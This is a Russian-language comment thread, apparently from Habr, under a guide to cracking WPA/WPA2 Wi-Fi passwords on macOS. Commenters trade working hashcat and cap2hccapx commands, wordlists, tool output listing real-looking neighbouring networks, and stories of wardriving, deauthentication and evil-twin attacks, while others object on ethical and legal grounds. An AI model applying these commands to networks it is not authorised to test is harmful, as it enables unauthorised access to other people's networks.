Comments 249
зато свободный ;)
порядки такие, 8 сиволов на нормальном железе ломаются за пару часов, 10 символов — месяц. 12 символов — 120 лет
# качаем вордлист для побора wpa/wpa2 сетей пароли (134MB)
Т.е. на деле вы не делали полный перебор а просто проверили словарные пароли? Или я что-то не так понял?
надолго нагружать мак может дорого обойтиськакой позор… Понакупают ноутов вместо нормальных стационарных компов, а потом боятся их использовать на полную.
Интересно, как вы будете ломать, если в пароле есть смайл из UTF-8?
P.S.: Habr «съел» один символ в конце сообщения `\u1f609`.
Each character in the pass-phrase must have an encoding in the range of 32 to 126 (decimal), inclusive. (IEEE Std. 802.11i-2004, Annex H.4.1)
А вот букваеноцифровые уже будет долго, очень. Оно того не стоит. Есть же WPS и Airgeddon.
чтобы его ввести надо быть внутри сети и знать сложный 30-символьный пароль.Либо заюзать какую-нибудь XSS-уязвимость для доступа к веб-интерфейсу прямо из вашего браузера.
net.ipcalf.com
Адреса, используемые в локальных сетях, относят к частным. К частным относятся IP-адреса из следующих сетей:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
Так же из специцикции ipv4 мы знаемЕщё мы оттуда знаем про CIDR, например.
меняешь последнюю цифру на 1 (редко на 100) и вот тебе ip роутера.
Так-то можно и ip не определять, стандартных адресов дай бог десяток наберётся, я с этого и начал:
Ну, обычно он где-то вроде 192.168.0.1, 192.168.1.1 или myrouter.local, routerlogin.net или чём-то подобном.
Вот из последнего горячего — habrahabr.ru/company/pentestit/blog/340182
В рамках данной сессии также была обсуждена уязвимость сетей Wi-Fi к атаке KRACK, выявленная в этом году. Было отмечено, что как минимум в двух местах стандарта указано, что повторное использование пар временных ключей и номеров пакетов нарушает безопасность. Тем не менее, большинство разработчиков программного обеспечения для устройств Wi-Fi не учли это требование. Чтобы избежать подобной ошибки в дальнейшем, в описание алгоритма было явно добавлено условие, устраняющее найденную уязвимость.
Первые два дня сидел с мобильного подключения, на третий начал гуглить, как подключиться к wi-fi соседа.
В общем, деньги тут не причём.
Если взять с собой пару пива эффект будет ошеломляющий и гораздо быстрее описанного в статье
В аналогичной ситуации я с извинениями отказал. Не потому, что жмот, а потому, что не хочу стать фигурантом дела по распространению экстремистских материалов, детской порнографии или чего-то подобного.
MAC адрес копируем любой из ваших устройств. В дампе трафика видно все MAC адреса в вашей сети.
Вот например на популярном Netgear WNR612v2 сколько не отключай WPS он все равно успешно взламывается, что было для меня неожиданностью.
Следователя в этом ещё предстоит убедить.
Как минимум в таком случае доброму владельцу роутера гарантирован обыск с изъятием всей компьютерной техники и носителей информации (для проведения экспертизы).
Почему? Купили мак, а потом денег нет так как в кредит. Ну понятно что это не про автора, но ситуация то вполне типичная с любыми дорогими вещами сейчас.
Для сетей с популярными SSID можно использовать готовые таблицы.
Например, на Church of Wifi есть посчитанные хэши для 1000 популярных SSID и миллиона различных паролей. (33 ГБ)
Я написал небольшой скрипт на python который дампает трафик на заданном канале и ищет в нем заданную строку github.com/zhovner/airport-sniffer
Так как дамп пишется в формате pcap, его можно в реалном времени читать с помощью tcpdump или wireshark.
P.S. Да я параноик, заберите меня с этой планеты.
Но я настолько ленив, что даже не могу испытать этот метод и поделится результатом =(
Извините.
Установи Linux второй OS и лениво пиши реальные «опыты»…
Зачем так заморачиваться — макоси хватает.
Ждём коммента про Солярис.
Только почему ты, уважаемый, думаешь, что своим воровством ты не наносишь никому вреда? Чем ты гордишся тут, в своей писанине?
— можно я к вам на ты?
— можно…
— слышь, ты, урод
что конкретно вас задело? то, что macosx из коробки с gui позволяет делать подобные действия? или то, что wifi стандарт настолько дырявый, что wps даже домохозяйки выключают?
Вы и дальше можете освещать своё жилище свечкой, ругаясь на электричество, что это злит Тора и Одина. А можете принять современный мир со всеми его плюсами и минусами. Можете ругать таких как я, а можете радоваться, что теперь вы в курсе как это делается и что нужно, чтобы это не произошло лично с вами.
то, что macosx из коробки с gui позволяет...
А ещё, когда макбук лежит на столе, у того ножки подгибаются от счастья и восхищения :-D
что конкретно вас задело?
Контекст подачи материала
а можете радоваться, что теперь вы в курсе как это делается и что нужно, чтобы это не произошло лично с вами.
Да, я в курсе, и приму соответствующие меры на своем роутере
У меня не запускается ни «./cap2hccapx
», ни «./cap2hccapx.bin
» из пакета «hashcat-utils
» (скачал архив с GitHub по указанной ссылке). Решил проблему так:
- Распаковал архив.
- В терминале перешёл в директорию «
bin
» этого архива. - В терминале выполнил команду «
make
». - Запустил скрипт: «
./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx
».
Ildars-MacBook-Pro:bin ildar$ pwd
/Users/ildar/hashcat/bin
Ildars-MacBook-Pro:bin ildar$ make
make: *** No targets specified and no makefile found. Stop.
root# ./cap2hccapx /var/tmp/2018.01.30_14-29-53-GMT+10.wcap /var/tmp/home.hccapx
-sh: ./cap2hccapx: No such file or directory
Ошибка означает, что в директории, из которой вы выполняете команду, нет файла «cap2hccapx». Чтобы её решить, нужно убедиться, что в терминале вы находитесь в нужной директории, и запускать файл «cap2hccapx.bin»:
./cap2hccapx.bin /var/tmp/2018.01.30_14-29-53-GMT+10.wcap /var/tmp/home.hccapx
Если консоль скажет, что не может выполнить этот файл, то сделайте по инструкции из моего комментария (только в шаге 2 переходите не в bin, а в src).
Ноутбук на борту имел Ubuntu Linux 12.04 + kismet + gpsd + aircrack-ng
Все это добро запускалось, и машина каталась около часика по всему району.
После поездки визуализировались данные, преобразуясь в точки Google Earth, куда наносились все найденные сети, их BSSID и тип защиты. Если какая то из точек была интересна — машинка ехала туда и в зависимости от типа защиты юзались механизмы aircrack-ng. Для WEP-защиты весьма хорошо работала Chopchop-атака, позволяя собрать нужное количество векторов инициализации за 5-10 минут, для WPA устраивался шторм пересылок DeAuth-пакетов, после чего чаще всего можно было выловить handshake точки и уже в домашних условиях с аппетитом вскрывать ее с помощью разных словарей.
Отдельное слово могу сказать про смешные устройства LaFonera FON, которые массово ставились абонентам провайдера Стрим, ныне ставшего МТСом. Все устройства, ввезенные в РФ этой компанией, по-дефолту защищались WPA-паролем из 10 символов. Вот только все символы были цифрами и первые 6 символов были одинаковы для всех устройств. Поймать handshake дело несложное, а перебрать 4 символа занимало 15 секунд даже на самом слабом ноутбуке.
Сейчас времена изменились — проще заплатить за интернет, чем ломать точку. Так что берегите себя и не стоит все вышеперечисленное бежать и проверять. УК никто не отменял, а соответствующие органы будут безумно рады, когда вас поймают. Удачи!
выглядело 8 назад
Ноутбук на борту имел Ubuntu Linux 12.04
2012+8=2020. Жить стало лучше?
Мне вот другое непонятно:
Сейчас времена изменились — проще заплатить за интернет, чем ломать точку.А что раньше — проще было ездить на машине в соседний квартал всякий раз, когда хочется посидеть в Интернете, чем заплатить за подключение у себя в квартире? Кроме спортивного интереса, другого объяснения подобрать не могу.
Лет десять лет назад один молодой отец периодически гулял по району со своим маленьким сыном в коляске. А в те времена WiFi-роутеры многих популярных производителей по умолчанию предоставляли полностью открытый WiFi. Так что на прогулку папа брал ещё и нетбук (планшеты получили распространение уже позже) и они неспешно прогуливались к какому-нибудь из нескольких мест, в которых по WiFi был доступен интернет через роутер, владелец которого не удосужился поменять заводские настройки. А таких мест было реально много. Там можно было присесть на лавочку и спокойно посёрфить, пока малыш сладко спал в своей коляске.
Однажды папа даже обнаружил локалку, где на компе была расшарена (разумеется, без какого-либо ограничения доступа) папка "Мои документы" c соответствующим содержимым. Не выдержав, папа положил в корень файл с именем "ПОСТАВЬ ПАРОЛЬ НА WiFi !!!!!!!.doc" и кратким описанием внутри, зачем это надо и как сделать. Не помогло. В те времена домашний интернет был уже безлимитный, а за посты в соцсетях ещё не сажали, так что владелец роутера на предупреждения забил.
PS. Всё вышеизложенное является исключительно плодом фантазии автора поста, любые совпадения с реальными событиями случайны.
И да, не только лишь все wi-fi адаптеры умеют переходить в режим прослушки сети.
hashcat (v4.0.1-115-g01a7476) starting...
* Device #2: This device's local mem size is too small.
No devices found/left.
Started: Sat Jan 27 16:02:48 2018
Stopped: Sat Jan 27 16:02:48 2018
Есть варианты запустить / пересобрать hashcat на CPU или с менее требовательным к объёму видеопамяти алгоритмом?
Есть еще вероломный способ. Меня не давно пытались так сломать) Глушат основную точку доступа, посылают пакеты деаутентификации, в это же время создается точка доступа с одноименным именем, соотв, на компе/ноутбуке/телефоне всплывает запрос на ввоз пароля. Ввели пароль и все, он у злоумышленника.
У меня два смартфона с одинаковым названием хотспота. Кажись винда ругалась, когда я менял с одной точки на другую.
Вопрос автору: это поможет мне избавится от Вас?
Но честно, я считаю это уже вредительством, хоть вариант и рабочий.
Лицензируется, с 2011 года, вроде как. Вопрос в том, насколько поправки в закон о такси соблюдаются, но это уже совсем другая история...
Угадал? ;)
Москва, Россия, 117587
55.629647, 37.616116
А вообще, разгул петросянства в комментах зашкаливает )))))11
К слову, интересно, что это все делается почти средствами голой ОС, да, но по факту есть куда более практичные инструменты для этого. И ЧАСОК не нужно дампать ради хендшейка, да и на целостность его можно проверить и прочее. А то тот же ривер не всегда расшифровывал, не имея все 4 пакета, хотя и говорило что «хендшейк пойман».
Но, судя по комментариям автора, он это всё знает, если уж про death-ы отписывал. К слову, юродивых соседей с SSID-ом «TY PI*OR» всегда можно держать ПО КД на деаутентификации, мой один сосед уже так роутер поменял, думал тот сломался. Почувствовал прям свою вину, жалко парня стало. Зато он ссид сменил.
PS Странно что никто еще не придумал крипту с брутфорсом паролей в качестве pow
Картина: середина 2000-х, провинциальный городок в 100 км от Питера, какому-то ламмеру взбрело сделать платный wi-fi интернет по городу. На тот момент мне лет ~14 и я читаю журналы «Хакер». С ними в комплекте есть диски с прогами (интернет в тот момент был isdn).
Итог: сеть без пароля, без шифрования и доступ к инету осуществлялся по mac-адресу, все директории в локальном личном кабинете открыты и доступны для редактирования.
Хотя канал выбрал самый забитый.
Ildars-MacBook-Pro:naive-hashcat ildar$ sudo ls -lh /var/tmp
-rw-r--r-- 1 ildar wheel 219M Jan 29 19:52 (null)_ch11_2018-01-29_18.31.02.pcap
Первое мое сомнение — «pcap» вместо ожидаемого «wcap».
Второе сомнение — это результат выполнения команды:
Ildars-MacBook-Pro:src ildar$ ./cap2hccapx.bin /var/tmp/\(null\)_ch11_2018-01-29_18.31.02.pcap /var/tmp/home.hccapx
/var/tmp/(null)_ch11_2018-01-29_18.31.02.pcap: Could not read pcap packet data
Networks detected: 2942
[*] BSSID=14:30:04:cd:1c:34 ESSID=Linh Ngan (Length: 9)
[*] BSSID=f4:28:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
[*] BSSID=84:a9:c4:19:77:d0 ESSID=Tra Mi (Length: 6)
--> STA=f4:28:01:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:01:b7:10:e0, Message Pair=2, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=10
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=10
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=18
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=0
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=1
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=2
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=3
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=4
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=5
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=0, Replay Counter=6
--> STA=f4:28:02:b7:10:e0, Message Pair=2, Replay Counter=7
[*] BSSID=f0:b4:29:44:5b:32 ESSID=PhamManh2 (Length: 9)
[*] BSSID=14:30:04:c3:13:18 ESSID=Minh Tu (Length: 7)
[*] BSSID=c4:e9:84:eb:bd:ea ESSID=Binh ThuonW (Length: 11)
[*] BSSID=a0:8c:f8:91:1a:38 ESSID=? (Length: 15)
[*] BSSID=c0:25:e9:c9:6f:6e ESSID=Huyen Anh (Length: 9)
[*] BSSID=df:e9:84:eb:bd:ea ESSID=Binh Thuon? (Length: 11)
[*] BSSID=9c:65:f9:22:0f:ab ESSID=HCE8FF (Length: 6)
[*] BSSID=a0:65:18:b6:7f:78 ESSID=P9-16-09 (Length: 8)
....
....
вот тут овер 3000 строк
....
....
[*] BSSID=34:20:7f:b1:05:8c ESSID=An Tony (Length: 7)
[*] BSSID=00:00:00:00:10:b5 ESSID=NTrung (Length: 6)
[*] BSSID=a0:65:18:6d:48:ce ESSID=P12)119 (Length: 8)
[*] BSSID=f0:d4:1f:44:5b:32 ESSID=PhamManh2 (Length: 9)
[*] BSSID=63:b8:f4:c9:6f:6e ESSID=Huyen Anh (Length: 9)
[*] BSSID=40:a9:5b:04:39:d4 ESSID=HoaNguyen (Length: 9)
[*] BSSID=ad:65:18:b4:c9:63 ESSID=P12-16+ (Length: 8)
[*] BSSID=a0:65:18:b4:51:6e ESSID=P12-1620 (Length: 8)
[*] BSSID=87:a9:77:63:47:68 ESSID=?K2018 (Length: 6)
[*] BSSID=f4:d4:72:b1:05:8c ESSID=An Tony (Length: 7)
[*] BSSID=a0:65:18:ad:5a:32 ESSID=Song La? (Length: 8)
[*] BSSID=a0:55:03:33:f6:1c ESSID=mixuxinh (Length: 8)
[*] BSSID=26:91:54:77:44:20 ESSID= (Length: 16)
[*] BSSID=e9:28:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
[*] BSSID=ad:65:18:7a:44:20 ESSID=Workbitch (Length: 9)
[*] BSSID=20:70:1e:b4:a9:55 ESSID=P1???620 (Length: 8)
[*] BSSID=c0:25:6a:ef:61:42 ESSID=Huyen Anh (Length: 9)
[*] BSSID=74:65:18:b3:e3:7a ESSID=mixuxinh (Length: 8)
[*] BSSID=2c:a7:f9:91:0e:ab ESSID=HCE8FF (Length: 6)
[*] BSSID=22:30:04:c2:02:b4 ESSID=Trung Vu (Length: 8)
[*] BSSID=a2:29:db:cf:ee:94 ESSID=HUAWE?'DPYT (Length: 11)
[*] BSSID=c0:25:e9:49:b6:6e ESSID=Huyen Anh (Length: 9)
[*] BSSID=18:cf:8c:cd:dd:65 ESSID=MM2018 (Length: 6)
[*] BSSID=14:30:04:43:ca:18 ESSID=Minh Tu (Length: 7)
[*] BSSID=c0:25:e9:c9:6f:7e ESSID=? (Length: 16)
[*] BSSID=ad:55:03:b3:e3:7a ESSID=mix?inh (Length: 8)
[*] BSSID=f4:4c:1f:87:05:8c ESSID=An Tony (Length: 7)
[*] BSSID=14:30:04:c3:df:9e ESSID=Minh Tu (Length: 7)
[*] BSSID=50:c7:bf:2a:72:09 ESSID=TP-LINK_72?\ (Length: 12)
[*] BSSID=f4:4c:7f:81:1e:8c ESSID=An Tony (Length: 7)
[*] BSSID=a0:65:7e:b6:39:0b ESSID=P9-08-09 (Length: 8)
[*] BSSID=a7:65:18:b6:7f:78 ESSID=P9-16-09 (Length: 8)
[*] BSSID=14:30:62:ce:1c:34 ESSID=Linh Ngan (Length: 9)
[*] BSSID=a0:65:18:ad:e9:53 ESSID=S_ug Lam (Length: 8)
[*] BSSID=14:56:07:cd:1c:34 ESSID=Linh Ngan (Length: 9)
[*] BSSID=1b:ab:a7:2a:72:6f ESSID=TP-LI?J_7270 (Length: 12)
[*] BSSID=a0:65:18:84:d2:63 ESSID=P12-1620 (Length: 8)
[*] BSSID=36:fe:67:ba:9d:af ESSID=Thu Hien (Length: 8)
[*] BSSID=06:b7:18:ba:28:20 ESSID=7YrӋ!?Щ (Length: 9)
[*] BSSID=f4:4c:e7:bc:05:8c ESSID=An Tony (Length: 7)
[*] BSSID=c4:e9:1c:26:d1:ea ESSID=Binh Thuong (Length: 11)
[*] BSSID=a0:65:f8:a5:c7:53 ESSID=P12-1620 (Length: 8)
[*] BSSID=80:dd:71:63:9c:af ESSID=Thu Hien (Length: 8)
[*] BSSID=78:30:04:c3:15:20 ESSID=HomeBB (Length: 6)
[*] BSSID=ec:75:a2:4d:03:8c ESSID=An Tony (Length: 7)
[*] BSSID=79:d6:19:b5:39:0b ESSID=P9?18M9 (Length: 8)
[*] BSSID=f4:4c:7f:b1:c5:d4 ESSID=An Tony (Length: 7)
[*] BSSID=18:d0:71:53:87:af ESSID=Thu Hien (Length: 8)
[*] BSSID=18:d6:c7:a6:d2:42 ESSID=T?,LINK_5158 (Length: 12)
[*] BSSID=53:93:ff:ff:ff:ff ESSID=TomBillTom2727 (Length: 14)
[*] BSSID=92:2b:cb:ba:10:e0 ESSID=Tra Mi (Length: 6)
[*] BSSID=19:30:04:cd:1c:34 ESSID=Linh Ngan (Length: 9)
[*] BSSID=a0:65:18:7a:24:d6 ESSID=?orkl?ch (Length: 10)
[*] BSSID=4a:cc:58:04:39:d4 ESSID=HoaNguyen (Length: 9)
[*] BSSID=18:d0:71:63:dc:1a ESSID=Thu Hien (Length: 8)
[*] BSSID=f9:df:37:2f:e0:5a ESSID=.brun? (Length: 6)
[*] BSSID=4d:bb:09:f6:a9:7f ESSID=HomeBB (Length: 6)
[*] BSSID=14:30:04:c3:13:67 ESSID=Minh Tu (Length: 7)
[*] BSSID=6c:8d:79:b1:05:8c ESSID=An Ton (Length: 7)
[*] BSSID=a0:65:18:e2:49:93 ESSID=Workbitch (Length: 9)
[*] BSSID=a0:05:42:25:f3:bd ESSID=P9-08-09 (Length: 8)
[*] BSSID=ad:65:18:b5:39:0b ESSID=P9-08-09 (Length: 8)
[*] BSSID=f4:4c:7f:b1:05:ec ESSID=An Tony (Length: 7)
[*] BSSID=2d:4c:7f:b1:65:ba ESSID=An Tony (Length: 7)
[*] BSSID=18:d6:07:ca:51:58 ESSID=TP-LINK_5158 (Length: 12)
[*] BSSID=9c:50:ee:af:39:02 ESSID=NTrung (Length: 6)
[*] BSSID=f4:4c:7f:b1:c5:e0 ESSID=An Tony (Length: 7)
[*] BSSID=c4:e9:84:3d:7c:ea ESSID=??$.W[hu/e (Length: 11)
[*] BSSID=60:63:18:7a:44:20 ESSID=Workbitch (Length: 9)
[*] BSSID=f4:28:93:65:11:ec ESSID=Tra Mi (Length: 6)
[*] BSSID=18:d6:c7:57:d8:8c ESSID=TP-LINK_D58C (Length: 12)
[*] BSSID=a0:5f:08:ce:ee:94 ESSID=HUAWEI-GPYT (Length: 11)
[*] BSSID=6c:25:53:b7:10:e0 ESSID=Tra Mi (Length: 6)
[*] BSSID=c4:d9:53:ed:bd:ea ESSID=Binh Thuong (Length: 11)
[*] BSSID=5c:65:18:b3:e3:7a ESSID=mixuxinh (Length: 8)
[*] BSSID=18:10:9d:ba:9c:af ESSID=Thu Hien (Length: 8)
[*] BSSID=48:1b:5d:6b:ee:ce ESSID=PhamM?oh (Length: 8)
Written 79 WPA Handshakes to: /var/tmp/home.hccapx
Смутило сообщение «Could not read pcap packet data» и «Networks detected: 2942».
Ну а финальный шаг за ночь ничего (как я понимаю не сделал):
Ildars-MacBook-Pro:naive-hashcat ildar$ HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh
hashcat (v4.0.1-122-g5b527f6a) starting...
OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i5-5257U CPU @ 2.70GHz, skipped.
* Device #2: Intel(R) Iris(TM) Graphics 6100, 384/1536 MB allocatable, 48MCU
Hashes: 79 digests; 77 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Password length minimum: 8
Password length maximum: 63
Watchdog: Temperature abort trigger disabled.
Dictionary cache hit:
* Filename..: dicts/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: /var/tmp/home.hccapx
Time.Started.....: Tue Jan 30 12:40:16 2018 (23 secs)
Time.Estimated...: Tue Jan 30 14:44:27 2018 (2 hours, 3 mins)
Guess.Base.......: File (dicts/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 1923 H/s (7.33ms)
Recovered........: 0/77 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 58822/14344384 (0.41%)
Rejected.........: 46534/58822 (79.11%)
Restore.Point....: 37101/14344384 (0.26%)
Candidates.#2....: 25241981 -> danielle06
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: /var/tmp/home.hccapx
Time.Started.....: Tue Jan 30 12:40:16 2018 (40 secs)
Time.Estimated...: Tue Jan 30 15:37:00 2018 (2 hours, 56 mins)
Guess.Base.......: File (dicts/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 1346 H/s (7.33ms)
Recovered........: 0/77 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 119394/14344384 (0.83%)
Rejected.........: 82530/119394 (69.12%)
Restore.Point....: 101786/14344384 (0.71%)
Candidates.#2....: emilyrocks -> iloveyou85
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Т.е. файл home-wifi.txt оказался пуст. Что я мог упустить?
а в остальном всё верно
Только пока не могу сообразить как выдернуть парочку отдельных хендшейков. Посмотрел первые строки:
Ildars-MacBook-Pro:~ ildar$ head -n 10 /var/tmp/home.hccapx
HCPXTra Mi?? ?????\A]???6???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#n4??yu
s??=?;?N¨![HsX?!??z???eB#n4??0???HCPXTra Mi?? ?????\A]???6???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#n4??yu
s??=?;?N¨![HsX?!??z???eB#n4??0???HCPX?Tra Mi??-©???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#o4??yu
s??=?;?N¨![HsX?!??z???eB#o4??0???HCPX?Tra Mi??-©???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#o4??yu
s??=?;?N¨![HsX?!??z???eB#o4??0???HCPX?Tra Mi? ?d??ES3?"4?????w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#p4??yu
s??=?;?N¨![HsX?!??z???eB#p4??0???HCPX?Tra Mi?T???+??[????y???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#q4??yu
s??=?;?N¨![HsX?!??z???eB#q4??0???HCPX?Tra Miv?_??A?3??P???q/???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#r4??yu
s??=?;?N¨![HsX?!??z???eB#r4??0???HCPX?Tra Mi?֟???O??#]$D???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#s4??yu
s??=?;?N¨![HsX?!??z???eB#s4??0??????????????HCPX?Tra Mi????
?5?:?k??﵄??w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#v4??yu
s??=?;?N¨![HsX?!??z???eB#v4??0???HCPX?Tra Mib??uO??veU???\???w?2?gwuG??g?KR?})?tCCgwO???Ԝ??(??s??=?;?N¨![HsX?!??z???eB#w4??yu
Какая-то ерунда. Как можно их выдернуть? Могу просто взять первые 2 строчки из файла?
usage: ./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
Т.е. в вашем случае
./cap2hccapx.bin /var/tmp/\(null\)_ch11_2018-01-29_18.31.02.pcap /var/tmp/home-HomeBB.hccapx HomeBB
для поиска хендшейков только к конкретной сети. Но я бы начал с просто короткого словаря. Например этого:
github.com/berzerk0/Probable-Wordlists/blob/master/Real-Passwords/WPA-Length/Top1378-probable-WPA.txt
кладёте его вместо rockyou и повторяете hashcat по всем сетям. По этому словарю перебор должен пройти намного быстрее.
Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5.Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая:
Key = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256)
Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое.
И второй вопрос. Как под Mac OS настроить карту Alfa AWUS036H, чтобы сканировать с ее помощью?
Респект таким парням!
А можно ли как-то ограничить работу программы, чтобы пусть медленнее, зато комп был в рамках рабочих температур?
Ремарка тем кто читает эту статью в 2021: naive-hashcat давно не обновлялся. Имейте это ввиду. Там есть забавный баг, при котором hashcat пытается подобрать пароль маской менее 8 символов. Пример где он сам понял что маска не подходит:
